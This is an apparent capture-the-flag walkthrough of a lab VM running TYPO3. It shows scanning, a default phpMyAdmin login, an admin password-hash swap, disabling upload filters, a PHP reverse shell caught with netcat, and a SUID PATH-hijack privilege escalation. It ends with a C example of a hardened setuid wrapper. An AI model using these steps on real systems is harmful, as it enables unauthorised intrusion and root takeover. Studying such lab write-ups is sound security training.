I have added the machine to my hosts file, so let's begin!
root@kali:~# cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
192.168.1.208   typo.local
Initial Enumeration and Shell
I started the reconnaissance by running a port scan with Nmap, checking default scripts and testing for vulnerabilities.
root@kali:~# nmap -sC -sV -oA nmap/typo typo.local
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 13:06 IST
Nmap scan report for typo.local (192.168.1.208)
Host is up (0.00051s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 cd:dc:8f:24:51:73:54:bc:87:62:a2:e6:ed:f1:c1:b4 (RSA)
|   256 a9:39:a9:bf:b2:f7:01:22:65:07:be:15:48:e8:ef:11 (ECDSA)
|_  256 77:f5:a9:ff:a6:44:7c:9c:34:41:f1:ec:73:5e:57:bd (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-generator: TYPO3 CMS
|_http-server-header: Apache/2.4.38 (Debian)
| http-title: Armour: Infosec
|_Requested resource was http://typo.local/en/
8000/tcp open  http    Apache httpd 2.4.38
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Did not follow redirect to http://typo.local
8080/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
8081/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:BD:46:E3 (Oracle VirtualBox virtual NIC)
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.71 seconds
We have Apache web servers running on four different ports. The next step was to run a Gobuster scan to look for hidden directories.
root@kali:~# gobuster dir -u http://typo.local -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o port80.log
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://typo.local
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
Starting gobuster
===============================================================
/en (Status: 200)
/license (Status: 403)
/README (Status: 403)
/changelog (Status: 403)
/ChangeLog (Status: 403)
/vendor (Status: 403)
/fileadmin (Status: 301)
/readme (Status: 403)
/todo (Status: 403)
/typo3temp (Status: 301)
/TODO (Status: 403)
/typo3 (Status: 301)
/vendorsolutions (Status: 403)
===============================================================
Finished
===============================================================
I found the typo3 and typo3temp directories, which suggests that this web server is running TYPO3 CMS. Then I performed the same scan on the other ports and found a phpmyadmin directory on port 8081.
root@kali:~# gobuster dir -u http://typo.local:8081 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o port8081.log
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://typo.local:8081
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/06/20 13:09:19 Starting gobuster
===============================================================
/phpmyadmin (Status: 301)
/server-status (Status: 403)
===============================================================
2020/06/20 13:12:05 Finished
===============================================================
First I went to the typo3 directory on port 80 and tried logging in with some default usernames and passwords, but I wasn't successful. Then I went to the phpmyadmin directory on port 8081 and again tried some common usernames and passwords. This time I was able to log in with username root and password root.
Inside phpMyAdmin, I found a database named TYPO3 that contained a table named be_users with two records.
These records contain passwords hashed with the argon2id algorithm. I found a website named argon2.online that can be used to generate such hashes, so I went there and created my own hash.
I replaced the admin user's hash in the be_users table with this hash. Now I was able to log in to the TYPO3 CMS on port 80 using username admin and password madhav.
Then I went to the Filelist panel to see if I could upload a PHP backdoor. Unfortunately, PHP uploads were disabled on this website. After some enumeration, I found an option named fileDenyUpload under Settings > Configure Installation-Wide Options, which restricts certain file extensions from being uploaded to the website. I cleared this option and saved the settings.
This time I was able to upload the backdoor. I used the php-reverse-shell from Pentest Monkey.
Then I started a netcat listener and sent a request to the uploaded backdoor using curl in another terminal, which gave me a reverse shell from the target machine.
root@kali:~# curl -v http://typo.local/fileadmin/shell.php
*   Trying 192.168.1.208:80...
* TCP_NODELAY set
* Connected to typo.local (192.168.1.208) port 80 (#0)
> GET /fileadmin/shell.php HTTP/1.1
> Host: typo.local
> User-Agent: curl/7.68.0
> Accept: */*
> 
root@kali:~# nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.1.11] from (UNKNOWN) [192.168.1.208] 48354
Linux typo 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
 13:28:24 up 23 min,  0 users,  load average: 11.49, 11.52, 8.82
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@typo:/$ 
Rooting this box was trivial. I searched for SUID files and found an unusual binary named apache2-restart.
www-data@typo:/tmp$ find / -type f -perm -u=s 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/umount
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/local/bin/apache2-restart
/usr/local/bin/phpunit
As the name suggests, this binary restarts the apache2 service. I confirmed this by running the strings command on the binary.
This is one of the most common privilege escalation methods: the binary calls service without an absolute path, so the command is resolved through the caller's PATH. All we need to do is create our own version of service in the /tmp directory and prepend that directory to the PATH variable. Then we can call apache2-restart, which will execute our malicious service with root privileges.
www-data@typo:/tmp$ echo '/bin/bash' > service
echo '/bin/bash' > service
www-data@typo:/tmp$ chmod +x service
chmod +x service
www-data@typo:/tmp$ export PATH=/tmp/:$PATH
export PATH=/tmp/:$PATH
www-data@typo:/tmp$ apache2-restart
apache2-restart
root@typo:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
Hurray! This worked as expected, and now we can read the root flag.
root@typo:/tmp# cat /root/proof.txt
cat /root/proof.txt
Best of Luck
$2y$12$EUztpmoFH8LjEzUBVyNKw.9AKf37uZWPxJp.A3aap2ff0LbLYZrF
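For the defender's side of the PATH hijack above, here is an added C example (not the source of the box's apache2-restart binary, which the post does not show): a hardened stand-in for a setuid restart wrapper. It refuses any command path that is relative, contains "..", or passes through a world-writable directory such as /tmp, and it execs the service binary directly with a fixed environment instead of letting a shell search the caller's PATH. The location /usr/sbin/service and the fixed PATH value are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/wait.h>

/* Returns 1 if path is absolute, contains no "/.." substring, exists, and
 * neither the file nor any directory above it is world-writable (as /tmp is);
 * otherwise 0. A bare name such as "service" is rejected outright. */
int trusted_exec_path(const char *path) {
    char buf[4096];
    struct stat st;
    if (path == NULL || path[0] != '/' || strstr(path, "/..") != NULL) return 0;
    if (strlen(path) >= sizeof buf) return 0;
    strcpy(buf, path);
    /* Walk from the full path up to "/", checking every prefix. */
    for (;;) {
        if (stat(buf, &st) != 0 || (st.st_mode & S_IWOTH)) return 0;
        if (strcmp(buf, "/") == 0) return 1;
        char *slash = strrchr(buf, '/');
        if (slash == buf) buf[1] = '\0';  /* "/bin" -> "/" */
        else *slash = '\0';               /* "/usr/sbin/service" -> "/usr/sbin" */
    }
}

/* Runs "<service_bin> apache2 restart" with a fixed minimal environment and
 * no shell, so the caller's PATH (and LD_* variables) never influence which
 * file executes. Returns the child's exit code, or -1 if the path is not
 * trusted or the child could not be started. */
int restart_service(const char *service_bin) {
    static char *const argv[] = { "service", "apache2", "restart", NULL };
    static char *const envp[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };  /* assumed */
    if (!trusted_exec_path(service_bin)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { execve(service_bin, argv, envp); _exit(127); }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) return -1;
    return WEXITSTATUS(status);
}

int main(void) {
    /* A file under /tmp is rejected before anything is executed. */
    printf("/tmp/service trusted? %d\n", trusted_exec_path("/tmp/service"));
    printf("/bin/sh trusted?      %d\n", trusted_exec_path("/bin/sh"));
    return 0;
}
```

In a real wrapper the assumed /usr/sbin/service would be a compile-time constant, never an argument, so the check is defence in depth against a packaging mistake rather than the only line of defence.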
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Alexandr Ivanov.